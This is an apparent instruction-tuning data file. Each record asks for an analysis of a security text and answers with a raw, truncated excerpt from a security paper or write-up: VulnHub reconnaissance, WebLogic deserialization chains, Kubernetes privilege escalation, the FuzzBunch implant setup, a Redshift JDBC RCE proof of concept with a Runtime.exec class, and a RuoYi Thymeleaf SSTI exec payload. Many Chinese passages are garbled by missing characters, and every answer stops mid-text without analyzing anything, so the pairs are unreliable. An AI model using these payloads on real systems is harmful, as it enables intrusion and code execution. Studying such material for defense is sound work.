{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# LemonSqueezy > https://download.vulnhub.com/lemonsqueezy/LemonSqueezy.7z 靶场IP`192.168.32.218` 扫描对外端口服务 ``` (rootkali)-[~] # nmap -p 1-65535 -sV 192.168.32.218 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 11:31 EDT Nmap scan report for 192.168.32.218 Host is up (0.00078s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) MAC Address: 00:0C:29:F6:8C:26 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.60 seconds ``` 访问80端口 ![image-20220909233308825](../../.gitbook/assets/image-20220909233308825-1675839828076806.png) 爆破web目录 ``` (rootkali)-[~] # dirb http://192.168.32.218 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Sep 9 11:45:04 2022 URL_BASE: http://192.168.32.218/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.32.218/ ---- + http://192.168.32.218/index.html (CODE:200|SIZE:10701) ==> DIRECTORY: http://192.168.32.218/javascript/ ==> DIRECTORY: http://192.168.32.218/manual/ ==> DIRECTORY: http://192.168.32.218/phpmyadmin/ + http://192.168.32.218/server-status (CODE:403|SIZE:279) ==> DIRECTORY: http://192.168.32.218/wordpress/ ---- Entering directory: http://192.168.32.218/javascript/ ---- ==> DIRECTORY: http://192.168.32.218/javascript/jquery/ ---- Entering directory: http://192.168.32.218/manual/ ---- ``` 访问`/wordpress/` ![image-20220910103506222](../../.gitbook/assets/image-20220910103506222-1675839828077808.png) 配置hosts ``` 192.168.32.218 lemonsqueezy ``` ![image-20220910103720426](../../.gitbook/assets/image-20220910103720426-1675839828077807.png) wpscan枚举用户 ``` wpscan --url http://lemonsqueezy/wordpress --enumerate u ``` ``` [i] User(s) Identified: [+] lemon | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Det", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前言 Coherence 组件是 WebLogic 中的一个核心组件内置在 WebLogic 中关于 Coherence 组件的官方 介绍https://www.oracle.com/cn/java/coherence/ 近些年weblogic Coherence 组件反序列化漏洞被频繁爆出苦于网上没有公开对 weblogic Coherence 组件历史反序列化漏洞的总结导致很多想入门或者了解 weblogic Coherence 组件反序列 化漏洞的朋友不知道该怎么下手于是本文便对 weblogic Coherence 组件历史反序列化漏洞做出了一 个总结和分析 关于 Coherence 组件反序列化漏洞利用链的架构我把他分为两个一个是基于 ValueExtractor.extract 的利用链架构另一个则是基于 ExternalizableHelper 的利用链架 构 前置知识 想理清 WebLogic 的 Coherence 组件历史反序列化漏洞需要首先了解一些 Coherence 组件反序列化漏 洞中经常会涉及的一些接口和类他们在 Coherence 组件反序列化漏洞利用中经常出现 ValueExtractor com.tangosol.util.ValueExtrator 是一个接口 在 Coherence 中 很多名字以 Extrator 结尾的类都实现了这个接口 这个接口中声明了一个 extract 方法而 ValueExtractor.extract 正是 Coherence 组件历史漏洞  ValueExtractor.extract 链部分 的关键 ExternalizableLite Coherence 组件中存在一个 com.tangosol.io.ExternalizableLite 它继承了 java.io.Serializable 另外声明了 readExternal 和 writeExternal 这两个方法 com.tangosol.io.ExternalizableLite 接口 和 jdk 原生的 java.io.Externalizable 很像注意 不要搞混了 ExternalizableHelper 上面提到的 com.tangosol.io.ExternalizableLite 接口的实现类的序列化和反序列化操作都是通 过 ExternalizableHelper 这个类来完成的 我们可以具体看 ExternalizableHelper 这个类是怎么对实现 com.tangosol.io.ExternalizableLite 接口的类进行序列化和反序列化的这里以 readObject 方 法为例 writeObject 读者可自行去查看 如果传入的 DataInput 不是 PofInputStream 的话Coherence 组件历史漏洞 涉及到的 ExternalizableHelper.readObject 传入的 DataInput 都不是 PofInputStream  ExternalizableHelper#readObject 中会调用 ExternalizableHelper#readObjectInternal 方 法 readObjectInternal 中会根据传入的中 nType 进行判断进入不同的分支 对于实现 com.tangosol.io.ExternalizableLite 接口的对象会进入到 readExternalizableLite 方法 可以看到在 readExternalizableLite 中 1125 行会根据类名加载类然后并且实例化出这个类的对 象然后调用它的 readExternal() 方法 漏洞链 ValueExtractor.extract 我们在分析反序列化利用链的时候可以把链分为四部分一个是链头一个是危险的中间的节点漏 洞点另一个是调用危险中间节点的地方触发点最后一个则是利用这个节点去造成危害的链 尾 在 Coherence 组件 ValueExtractor.extract 利用链架构中这个危险的中间节点就是 ValueExtractor.extract 方法 漏洞点 ReflectionExtractor ReflectionExtractor 中的 extract 方法含有对任意对象方法的反射调用 配合 ChainedExtractor 和 ConstantExtractor 可以实现类似 cc1 中的 transform 链的调用 涉及 CVE CVE-2020-2555CVE-2020-2883 MvelExtractor MvelExtrator 中的 extract 方法会执行任意一个 MVEL 表达式R", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n30/06/2009 1 Chema Alonso, José Palzón 30/06/2009 2 Metadata: Information stored to give information about the document.  For example: Creator, Organization, etc.. Hidden information: Information internally stored by programs and not editable.  For example: Template paths, Printers, db structure, etc Lost data: Information which is in documents due to human mistakes or negligence, because it was not intended to be there.  For example: Links to internal servers, data hidden by format, etc Wrong management Bad format conversion Unsecure options New apps or program versions Embedded files Search engines Spiders Databases Embedded files Wrong management Bad format conversion Unsecure options 30/06/2009 3 The answer is NOT. Almost nobody is cleaning documents. Companies publish thousand of documents without cleaning them before: Metadata. Hidden Info. Lost data. Total: 4841 files 30/06/2009 4 Real Name Username Internal Domain .. And more 30/06/2009 5 Total: 896 files 30/06/2009 6 Total: 1075 files 30/06/2009 7 User Software Version Internal Server NetBIOS name Remote Printer Name Local Printer 30/06/2009 8 30/06/2009 9 Office documents: Open Office documents. MSOffice documents. PDF Documents.  XMP. EPS Documents. Graphic documents.  EXIFF.  XMP. And almost everything. 30/06/2009 10 EXIFREADER http://www.takenet.or.jp/~ryuuji/ 30/06/2009 11 http://video.techrepublic.com.com/2422-14075_11-207247.html 30/06/2009 12 30/06/2009 13 Users: Creators. Modifiers . Users in paths.  C:\\Documents and settings\\jfoo\\myfile  /home/johnnyf History of use. Operating systems. Software versions. Paths. Local and remote. Network info. Shared Printers. Shared Folders. ACLS. Printers. Local and remote. Internal Servers. NetBIOS Name. Domain Name. IPAddress. Database structures. Table names. Colum names. Devices info. Mobiles. Photo cameras. Private Info. Personal data. 30/06/2009 14 Info is in the file in raw format: Binary. ASCII . Therefore Hex or ASCII editors can be used: HexEdit. Notepa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 DEFCON 16 Black vs. White The complete life cycle of a real world breach August 13th, 2008 David Kennedy aka ReL1K Ken Stasiak aka Static Scott White aka Sasquatch Andrew Weidenhamer aka Leroy CD Distribution  Note, this presentation was made specifically for the CD distribution at DEFCON. The majority of the presentation is live demonstrations and rooting boxes. Content has been added to the presentation to reproduce some of the attacks we used. 2 Presentation Overview Black vs. White: The complete lifecycle of a real world breach  Brief introduction  3 minutes  Live demonstrations (Black Hat)  15 minutes  Tool demonstrations (Black Hat)  Two tools 40 minutes  Manual techniques  15 minutes  Detecting the breach (White Hat) - 5 minutes  Whats the Malware doing? (White Hat) - 10 minutes  How we built it and got it passed AV (White Hat)  20 minutes  End Presentation 3 The Scenario  Fortune 100 company hired us in 2007 to perform a penetration to simulate an attack. Ok. What's new? Well they wanted to see things from start to finish.  What we did. Rooted them inside and out with some sweet hacks, installed some malware that SURPRISINGLY AV didnt catch (uh huh).  Great, we did some sweet stuff... They suspect a server is compromised, what do you do to see if it is? Our AV isnt doing squat, and our IPS only looks at the network layer, operating system, and known web server attack signatures... What about the web application layer? 4 Live Demonstration Live Demonstration time. 5 Tool Demonstrations  Special Release  Weve written two custom tools specifically for DEFCON:  SA Exploiter Beta  SQLPwn Beta 6 The Initial Attack  Login Form: Simple SQL Injection  throws error messages. 7 Error Out Baby 8 9 SQL Injection Basics  Basic SQL syntax:  SELECT <data field name> FROM <table> WHERE <conditional>  Example table named users  The query: SELECT user_id FROM users WHERE login_name = admin AND password = p455w0rd would return the value 13  SELECT user_id FROM users WHERE log", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nnode_to_clusteradmin-如何从Kubernetes节点权限提升集群管理员权限.md 5/23/2022 1 / 8 如何从 Kubernetes 节点权限提升集群管理员权限 我有幸参加了去年的 KubeCon 并分享议题议题的其中个攻防案例讲述了如何从个边缘业务的开发者权 限逐步提升 Kubernetes 集群管理员权限其中最后步的法是描述关于节点上利 DaemonSet 和 Pod 上的 ServiceAccount token 进提权那年我在补天上的议题也简述了这个法在今年的 KubeCon 欧洲上这样的攻击法被命名为了\"蹦床\"快速过完国外的这篇 slide 之后深感他们研究的细致和 对我去年的形匆匆熬夜赶稿他们倾注了更多的时间和资源完成了我的很多遗憾和不也让我重拾 了这块研究的很多记忆 诶很多TIPS捂着捂着就捂坏了再熬夜通宵写完这篇稿吧 我把历史上这块相关的分享都汇总到了 https://github.com/neargle/my-re0-k8s-security , 于知识整理勘 误和迭代来避免各平台不便修改内容的问题 Kubernetes集群下的横向移动 本质上今天要讲的技巧和法就是攻防中经典环节横向移动只不过在 Kubernetes 节点中的横向移动有 些新的技巧和法更加通危害也更 图引 https://ithelp.ithome.com.tw/articles/10262662 本涉及的横向移动法般发于 Kubernetes 的节点上即红队已经获取了 Kubernetes 集群的台服务 器权限并以当前的服务器为起点横向移动控制更多的服务器从通往靶标这最直接的法就是找机 会把的权限从节点权限提升到集群管理员cluster admin权限拥有控制 Kubernetes 集群任意资源的 能 当然除了直接提升到 Cluster admin我们也经历过较曲折需要步步提权的渗透过程例如 从节点A控制节点B上的Pod和容器再逐步提升 Cluster admin 从节点A控制节点B整个服务器再逐步提升 Cluster admin node_to_clusteradmin-如何从Kubernetes节点权限提升集群管理员权限.md 5/23/2022 2 / 8 把当前节点的POD通过 nodeSelector lable 等配置迁移到其他节点继续渗透该节点再逐步提升 Cluster admin 从节点A获取控制 ServiceIngress 等资源的权限拥有管控东向或南北向流量的能然后利 Ingress-nginx CVE-2021-25742 的漏洞提升到 Cluster admin 修改 ServiceAccount 的权限绑定查看更多Secret秘钥甚集群内的中间攻击如利 CVE- 2020-8554 漏洞等等 但是都会经常和 ServiceAccount 的利法打交道也就是 Palo Alto Networks 研究员所说的 蹦床 (Trampoline) 法 可能\"蹦床\"法并必要 不过其实部分情况下红队需了解 ServiceAccount 也能完成横向移动标现在的集群管理员有很多坏 病如有些集群管理员会在每个节点的 ~/.kube/config 或其他录放置集群管理员的 kubeconfig 件 便运维只要 find 下我们就能获取 Kubernetes 的集群管理员权限 同时如果集群管理员不遵守节点上的运维规范传统的横向移动段也依然适包括但不限于 服务器上监听的端存在RCE漏洞 节点上放置了可以登录其他服务器的 SSH 私钥 获取 SSH 密码如 本地信息收集stracesudo钓等 节点 Agent 的漏洞挖掘 漏洞攻击动化运维管控系统跳板机堡垒机密码库发布平台等 当然Kubernetes集群对于攻防来说最的变化之就是把业务和应的可执能从服务器上限制到 个个 POD 中业务代码和业务运维原则上不会拥有控制节点的能也法影响到节点服务器所以如 果是标准且原的线上集群集群管理员是不会登录到各个节点上进运维的也不会留下很多痕迹和攻击  DaemonSet 和 ServiceAccount 这个法的核需要理解 DaemonSet 和 ServiceAccount 的设计其中 DaemonSet 经常被集群管理员来 运维和管理节点也得到了很多云原安全 Agent 的睐之所以这个法较通是 DaemonSet 和 ServiceAccount 有两个默认特性 1当集群管理员新建个 DaemonSet 资源时每个节点上都会运个由 DaemonSet 管理的 POD 实例 副本 因为这样的特性我经常 DaemonSet 兼岗运维来帮集群管理员处理些安全问题例如我就经常使下 的 DaemonSet 帮忙清理集群下所有", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Paparazzi Platform Flexible, Open-Source, UAS Software and Hardware esden, dotAero, misterj, cifo Outline  History, User Community, Competitions & Missions  Software  Hardware  Example Vehicles  Demos Who are we? Who is Paparazzi? Micro unmanned aerial vehicle framework http://paparazzi.enac.fr Why do I care? We're not going to preach the advantages of autonomous or RC vehicles - you know this already. Paparazzi: - Innovative - Competitive - Hugely flexible \"Many start Paparazzi as UAV hobbyists and leave as professionals!\" History The journey started in 2003 Pascal Brisset & Antoine Drouin History Ecole Nationale de lAviation Civile Toulouse, France History Over 60 developers contributing code several hundred users from 18 countries and counting Involved Universities Competitions  JMD03, Toulouse, France : 1st place with the Twinstar  EMAV04, Braunschweig, Germany : 1st place with the Microjet  JMD04, Toulouse, France : 1st place with the Microjet  MAV05, Garmisch, Germany : 4 Paparazzi teams at the first 4 places  EMAV06, Braunschweig, Germany : all the teams were equipped with Paparazzi  MAV06, Sandestin, Florida : 2nd and 3rd places  MAV07, Toulouse, France : 1st place (tie), 3rd, 4th and 5th places  OC09, Queensland, Australia : 1st place robot airborne delivery challenge  IMAV2011, Harde, Netherlands : 2nd place outdoor challenge  DARPA UAVForge 2011-12 : 3rd place Missions 2011 Antarctica Finnish Meteorological Institute Missions 2012 Southern Madagascar multi university Software - Overview  Airborne and Ground Segments  Reconfigurable multi-agent system, small programs perform simple tasks Software - Overview Software - Ground Segment Software - Ground Segment Reconfigurable UI (XML) Software - Airborne Segment  Modules allow easy addition or replacement of functionality  Supports a multitude of sensors and actuators  XML-based automatic code generation allows quick code adaptation for different vehicle configurations Software - Airborne Segment  Compleme", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n安全服务解读 by yuhao 安全服务从业员占在整个业的占越来越其中很多未来或许会成为甲的安全信息化员 安全研究员红蓝对抗员代码审计的员CTF研究员 本解决的主要的是很多在步作的第份work就是名普通的安全服务员如何了解业如 果成为已经是名安全服务从业者如何提我价值所以有必要可以讲解下什么是安全服务不 要成为单低廉的重复作劳动 安全服务整体架构 安全服务在现在的络环境下所带来的价值和其作前景如何我将安全服务分为以下种类型然 后按照其中的作内容对其所必备技能和带来价值进定的解读 通过个简单的分类我们可以知道安全服务的致作接下来我们可以分解其中的每项和必 备技能不是值守单的渗透测试或者安全漏扫这些有什么槛的作 安全咨询 安全咨询诞于互联企业传统医疗交通融等业步了信息化的2.0时代要拥抱信息化这个 过程中其整体信息化架构的逐步完善过程 例如家都知道在互联每年会招聘顶级的安全架构师技术总监这些leader从事的作主要内 容就是整个企业的信息安全机构信息科技化的进度信息安全管理等 但是但是我们抛开这些字节阿这些企业量的国有企业营企业没有并不能招聘到这种顶 尖才故就需要安全公司提供下服务 般能从事这种服务的程师会成为顶尖的架构设计师论是还是甲都是安全专家的title 那么个合格的安全咨询需要解决什么样的问题 正如个软件开发样有命周期个企业的安全建设依然有命周期 那么其中临的挑战就是 安全评估 除去其中最难的安全咨询以后安全服务的第个服务价值点就是安全评估诸如银融为什么安 全做的多数其他企业安全做的好呢并不是因为他们技术顶尖采的web系统更新快反有些 应系统数年没有更新换代主要原因就是监管的要求下这类企业每年会花量精去做安全评估 安全评估我分为两类 传统安全评估新安全评估 信息安全架构规划 信息科技服务能优化及提升 信息科技险管理体系建设 等级保护2.0建设咨询 信息安全管理体系建设 应架构挑战 管理制度挑战 威胁脆弱性变化的挑战 运营能挑战 其中传统的安全评估可能就到我们熟悉的些式了 渗透测试-Web应评估 注攻击 跨站脚本 权限问题 信息泄漏 框架漏洞 供应链攻击 代码审计 PHP JAVA 新的安全评估其内容如下 安全测试 安全测试就是安全服务中最常类服务也是最容易接触的个红蓝对抗的研究者代码审计的研 究者普通渗透测试研究者都可以轻易上对传统的Web应系统进盒+盒的渗透测试 这也就是安全测试需要技能和素质的安服员的原因需要想研究员的研究和学习能看 配置检查 中间件基线 数据库基线 安全设备策略 络设备策略 抗反编译能 代码混淆防护 基础合规检查 物理环境检测 Web渗透测试 移动应渗透测试 代码审计服务 安全公司安全服务采代码审计的形式提供服务需要代码审计能强的安全程师采快速的 式对代码进审计 护动 随着国->省->地市的护动越来越频繁规模越来越在安全测试当中的实战攻击已经越来越趋 近于真实的攻击所以在安全服务中有很部分程师是实际的安全攻防员他们也是以内渗 透和漏洞追踪为主积累响应的攻击段和藏匿段 但是我们可以显易的这种内卷为导致红队员的攻击越来越难需要从更维度的攻击法才 能攻破标从17年今其攻击段可以从下图的 hvv的攻击催了安全服务量的红队测试蓝队防御等项其在推动技术更新换代的上是功不可没 的 安全运维 安全运维是安全服务中最体的作也是家最不参与的安全环那就是靠体换取脑对络 安全整体个架构辅助设备的期监视其中的作内容就有如下: 当然 安全运维的另项必备技能就是应急响应的能-对志的分析 络的可靠性络设备和链路冗余设备选型及可扩展性 络边界的安全络设备的ACL防墙vlan物理隔离等 络协议分析路由交换组播IGMPipv4ipv6 络流量分析带宽流量分析异常流量分析抗拒绝服务能 络通信安全通信监控通信加密vpn分析等 设备身安全snmp令设备半杯系统漏洞端 络安全管理管系统登陆协议志审计身份验证 志分析->判断事件类型->获取志件->志分析->分析过程记录->输出报告 每年的hvv这个重的活动中顶尖蓝军的技能也会让红军常的头疼当然这就涉及到内卷这个完整过 程了 安全运维这些基本技能掌握之后就有另个除去常运维以外的个重安全服务内容-那就是型活动 的重要保障作如奥运会亚运会中会议这些个成果的会议的举是离不开安全运维的同 志们的幸苦作的其中作内容如下 安全运营 安全运营类的安全服务是基于智慧城市和云计算的发展衍出来的新型服务内容现在私有云+公 有云+混合云的安全架构已经是常普遍那么就的增加了整体运营难度所以需要安全服务的相关 员提供安全运营的服务 那么安全运营最终要达到什么标呢 那么要建设整体的安全运营能就需要以下个阶段 安全能集约化 安全态势可视化 安全决策科学化 安全治理现代化 安全应急 安全应急能考察了个安全程对安全个敏感程度从我的度", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWesley McGrew HORNECyber.com An Attacker Looks at Docker: Approaching Multi-Container Applications Wesley McGrew, Ph.D. Director of Cyber Operations HORNE Cyber wesley.mcgrew@hornecyber.com @mcgrewsecurity Wesley McGrew HORNECyber.com 1 An Attacker Looks at Docker: Approaching Multi-Container Applications TABLE OF CONTENTS Table of Contents Introduction Motivation Prior Work Attacking Application Internals Concept Malware Exploitation The Training Gap (Again) Containerization Concept Taking Advantage of the Abstraction Docker as a Target Application Platform EXAMPLE: Basic Exploration of Docker Container Applications Setup Exploring the Deployed Applications Network Controls Between Applications Implications for Attackers EXAMPLE: Post-Exploitation Inside Containers Motivation Identifying Network Information Loading Tools into Compromised Containers Exploiting the Outer Surface of a Multi-Container Application Introduction 1 3 3 4 5 5 5 5 6 6 6 6 7 8 8 11 13 14 15 15 15 16 18 18 Wesley McGrew HORNECyber.com 2 An Attacker Looks at Docker: Approaching Multi-Container Applications TABLE OF CONTENTS Value in Lab Environments Vulnerabilities Brought into and Carried Along in Containers EXAMPLE: Post-Exploitation of a Multi-Container Application Introduction Target Application Setup Attacker Setup Exploitation Identifying Containerization Exploring the Multi-Container Network Attacking the Application-Internal Database Server Conclusions Bibliography 19 19 20 20 21 24 25 26 26 31 34 35 Wesley McGrew HORNECyber.com The goal of this white paper, and its associated talk, is to provide a hacker experienced in exploitation and post- exploitation of networks of systems with an exposure to containerization and the implications it has on offensive operations. Docker is used as a concrete example for the case study. As a tool for enabling service-oriented architectural styles of development, the rise in popularity of using containers is relatively recent. While exploitation and ma", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 amazon-redshift-jdbc-driver RCE(CVE-OLOO- QNWOW) 漏洞分析 漏洞复现 漏洞修复 这个漏洞与之前的 pgsql JDBC 漏洞(CVE-2022-21724)是师出同 漏洞详细https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69- hjw2-fm86 DriverManager 类建 JDBC 的连接代码如下 调栈 漏洞分析 package org.example; import java.sql.DriverManager; import java.sql.SQLException; public class App { public static void main( String[] args ) throws SQLException { DriverManager.getConnection(\"jdbc:redshift://examplecluster.abc123 xyz789.us-west-2.redshift.amazonaws.com:5439/dev?socketFactory=org.exampl e.atao&socketFactoryArg=calc\"); } } 1 2 3 4 5 6 7 8 9 10 11 12 Java 复制代码 2 从 SocketFactoryFactory#getSocketFactory 法看起 25从 info (URL传递的属性)取 socketFactory的值 接着30还会 取 socketFactoryArg 的值如果 socketFactoryArg 值不存在的话就会异常退出 接着往下看 ObjectFactory#instantiate 法 DriverManager#getConnection Driver#connect Driver#makeConnection RedshiftConnectionImpl#RedshiftConnectionImpl ConnectionFactory#openConnection ConnectionFactoryImpl#openConnectionImpl SocketFactoryFactory#getSocketFactory ObjectFactory#instantiate 1 2 3 4 5 6 7 8 Plain Text 复制代码 3 19通过 Class.forName 加载类此时 classname 变量是由 socketFactory 传(可控)所以这可以 是可以加载任意类的 第个 try ... catch ... 语句直接看 catch 语句获取 单String 参数的构造法然后 args 变量会被改为 只有 stringarg 变量的字符串数组stringarg 变量是由 socketFactoryArg 传(可控)所以这个String 的内容也是定义的 最后调 newInstance 法成对象 这构造个恶意类代码如下 在开始写的连接代码进利即可 pom.xml 添加依赖 CVE_2022_41828.java 漏洞复现 package org.example; import java.io.IOException; public class atao { public atao(String cmd) throws IOException { Runtime.getRuntime().exec(cmd); } } 1 2 3 4 5 6 7 8 9 10 Java 复制代码 <!-- https://mvnrepository.com/artifact/com.amazon.redshift/redshift-jd bc42 --> <dependency> <groupId>com.amazon.redshift</groupId> <artifactId>redshift-jdbc42</artifactId> <version>2.1.0.7</version> </dependency> 1 2 3 4 5 6 XML 复制代码 4 执截图 链接https://github.com/aws/amazon-redshift-jdbc- driver/commit/9999659bbc9f3d006fb02a0bf39d5bcf3b503605 官将原来的强转修改成从开始就限制了class类 漏洞修复 package cve.test; import java.sql.DriverManager; import jav", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n关于昨天看到的url:的scheme 0x00 前 昨天看到p 发出来的那个url:的scheme的技巧感觉很有意思就仔细看了下 致如下 意思是在url前加上前缀url:也可以正常执第感觉应该是如url:file:///etc/passwd可以拿来绕过startwith(\"file://\")来请求file协议 0x01 试下 我不太懂java所以要试下 正常请求百度加了url确实可以正常请求试下file 报错了查了下似乎是不允许把file协议丢给http handler来执所以报错了我不太清楚这是不是jdk1.8出来的问题不过搜了下改成下 这样确实可以了 0x02 跟下 简单跟下看看是哪的问题 真是绝了真的就特别加了个url:匹配到了就start往后移4个字符 我于是去搜了下关于这个url的资料我没找到 http://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml 这是注册的公认的uri schemes这也没有查到这个url不太理解为什么要加个这个不过既然不是公认的那应该只有这个地 能的可能性 0x03 加个空格 既然看到这段了就能注意到这还对空格进检测那么我们在前加空格也样可以达到绕过startwith的的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEquation FuzzBunch TOC 概述 作者根据EQGRP公开资料进行研究分析研究相关工具的开发实现和攻击防御思路 因为木有找到NOPEN这个C2的Windows下的Beacon程序所以找了一些资料发现就是FB可 以进行Windows下的C2操作虽然是个python程序但是也好过于无 所以决定查看当前的研究成果整理一个环境看看能不能与NOPEN进行联动 FuzzBunch的中文翻译就是模糊测试工具集用来对目标系统进行渗透 基本信息 本次分析的代码来自shadowbroker的爆料经过网络接力我们这里使用三好学生修改 Francisco Donoso的的代码 当然也可以直接从泄露代码构造777388/EQGRP_Lost_in_Translation: Decrypted content of odd.tar.xz.gpg, swift.tar.xz.gpg and windows.tar.xz.gpg (github.com)多花一点时间而已 git clone https://github.com/3gstudent/fuzzbunch.git Cloning into 'fuzzbunch'... remote: Enumerating objects: 7169, done. remote: Total 7169 (delta 0), reused 0 (delta 0), pack-reused 7169 Receiving objects: 100% (7169/7169), 129.91 MiB | 10.26 MiB/s, done. Resolving deltas: 100% (2454/2454), done. Updating files: 100% (6452/6452), done. python.exe -V Python 2.7.18 pip install pywin32 java -version openjdk version \"1.8.0_41\" OpenJDK Runtime Environment (build 1.8.0_41-b04) OpenJDK Client VM (build 25.40-b25, mixed mode) 注意版本信息 执行后就会出现一个Java swing编制的GUI客户端 这里的测试环境是两台设备一台是fb控制机一台是目标机 具体的配置情况如下 后续可能会使用一台win 2003作为测试机 java -jar Start.jar OS 名称: Microsoft Windows 10 Pro OS 版本: 10.0.19043 暂缺 Build 19043 系统类型: x64-based PC IP 地址 [01]: 172.19.2.1 Windows xp sp3 中文版 IP 地址 [01]: 172.19.2.16 操作流程 Beacon生成 我这里的操作是pc_prep可以生成PeddleCheap 这个Terminals下的命令行支持TAB补全 pc_prep [01:23:23] ID: 134 'python' started [target: z0.0.0.1] - Possible payloads: - 0) - Quit - 1) - Standard TCP (i386-winnt Level3 sharedlib) - 2) - HTTP Proxy (i386-winnt Level3 sharedlib) - 3) - Standard TCP (i386-winnt Level3 exe) - 4) - HTTP Proxy (i386-winnt Level3 exe) - 5) - Standard TCP (x64-winnt Level3 sharedlib) - 6) - HTTP Proxy (x64-winnt Level3 sharedlib) - 7) - Standard TCP (x64-winnt Level3 exe) - 8) - HTTP Proxy (x64-winnt Level3 exe) - 9) - Standard TCP Generic (i386-winnt Level4 sharedlib) - 10) - HTTP Proxy Generic (i386-winnt Level4 sharedlib) - 11) - Standard TCP AppCompat-enabled (i386-winnt Level4 sharedlib) - 12) - HTTP Proxy AppCompat-enabled (i386-winnt Level4 shared", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nruoyi rce payload snake yaml ssti yaml emmmmmm ssti jar Spring Thymeleaf @Controller public class SstiController { @RequestMapping(\"/ssti\") public String ssti(@RequestParam String payload) { return payload; } } @Controller String thymeleaf SSTI @Controller public class SstiController { @RequestMapping(\"/ssti\") @ResponseBody public String ssti(@RequestParam String payload) { return payload; } } @ResponseBody Spring HttpMessageConverter Response body @Controller @ResponseBody @RestController @RestController (RuoYi)rce public class SstiController { @RequestMapping(\"/ssti\") public String ssti(@RequestParam String payload) { return payload; } } ruoyi POST /monitor/cache/getNames HTTP/1.1 Host: 10.0.0.3 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cookie: JSESSIONID=fc94c0ba-1588-4cbf-b4d8-1206280f7790 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 73 fragment=${T (java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")} snake yaml ruoyi thymeleaf shiro thymeleaf 3.0.12.RELEASE new payload threedr3am T ( RuoYi @RequiresPermissions shiro key ssti rce", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncode = '''addi sp, sp, -64 sw ra, 4(sp) sw s0, 0(sp) addi s0, sp, 8 addi sp, sp, -32 sw s1, 28(sp) sw s2, 24(sp) sw s3, 20(sp) sw s4, 16(sp) lui s1, 0x7 addi s1, s1, -1534 sw s1, 0(s0) lui s1, 0xc addi s1, s1, -133 sw s1, 4(s0) lui s1, 0x1 addi s1, s1, 1086 sw s1, 8(s0) lui s1, 0x6 addi s1, s1, 1627 sw s1, 12(s0) lui s1, 0xf addi s1, s1, -1242 sw s1, 16(s0) lui s1, 0x3 addi s1, s1, -770 sw s1, 20(s0) lui s1, 0xe addi s1, s1, -719 sw s1, 24(s0) lui s1, 0x4 addi s1, s1, -508 sw s1, 28(s0) lui s1, 0x8 addi s1, s1, 574 sw s1, 32(s0) lui s1, 0x7 addi s1, s1, 629 sw s1, 36(s0) lui s1, 0x5 addi s1, s1, -1394 sw s1, 40(s0) lw a7, 0(s0) lw s3, 4(s0) lw s2, 8(s0) lw a6, 12(s0) lw a5, 16(s0) lw a4, 20(s0) lw a3, 24(s0) lw a2, 28(s0) lw a1, 32(s0) lw a0, 36(s0) lw s1, 40(s0) lui s4, 0x9 addi s4, s4, 889 mul a7, s4, a7 or a7, a7, s3 and a7, a7, s2 xor a6, a7, a6 or a5, a6, a5 or a4, a5, a4 xor a3, a4, a3 or a2, a3, a2 mul a1, a2, a1 add a0, a1, a0 and a0, a0, s1 j 0x108 lw s1, 28(sp) lw s2, 24(sp) lw s3, 20(sp) lw s4, 16(sp) addi sp, sp, 32 lw ra, 4(sp) lw s0, 0(sp) addi sp, sp, 64 ret ''' def risc_execute(code): code = code.split('\\n') regs = { 'sp': 0, 'ra': None, 's0': None, 's1': None, 's2': None, 's3': None, 's4': None, 's5': None, 's6': None, 's7': None, 's8': None, 's9': None, 's10': None, 'a0': None, 'a1': None, 'a2': None, 'a3': None, 'a4': None, 'a5': None, 'a6': None, 'r3': None, } mem = {} for insn in code: insn = insn.replace(',', ' ').split() if not insn: continue op = insn[0] args = insn[1:] # print op, args if op == 'j': continue # yolo elif op == 'lui': if '0x' in args[1]: regs[args[0]] = int(args[1], 16) * 2 ** 12 else: regs[args[0]] = int(args[1]) * 2 ** 12 elif op == 'li': regs[args[0]] = int(args[1], 16) elif op == 'addi': regs[args[0]] = regs[args[1]] + int(args[2]) elif op == 'add': regs[args[0]] = (regs[args[2]] + regs[args[1]]) % 2 ** 32 elif op == 'sub': regs[args[0]] = (regs[args[1]] - regs[args[2]]) % 2 ** 32 elif op == 'ori': regs[args[0]] = regs[arg", "category": "text_analysis", "source": "security_papers"}
